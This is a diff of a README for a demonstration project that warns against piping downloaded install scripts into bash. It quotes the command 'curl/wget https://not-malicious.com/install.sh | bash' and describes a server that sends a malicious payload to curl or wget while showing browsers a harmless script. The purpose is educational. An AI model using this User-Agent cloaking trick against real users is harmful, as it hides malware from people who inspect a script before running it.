freddd/pipe-to-bash/README.md

 # pipe-to-bash
 Piping install scripts you find on the internet to bash is a big security risk, yet many projects/vendors suggests this practice.
-This is a simple example showing why "curl/wget https://not-malicious.com/install.sh | bash" is bad and how you can get fooled even though you inspect the payload in the browser before executing it.
+This is a simple example showing why `curl/wget https://not-malicious.com/install.sh | bash` is bad and how you can get fooled even though you inspect the payload in the browser before executing it.

 By using the `User-Agent` header we detect whether or not the call is coming from `curl` or `wget` commonly used when piping to bash, if so we supply the malicious payload.
 If the user is using any other `User-Agent` (such as Chrome, Firefox, etc) we will show a non-malicious install script.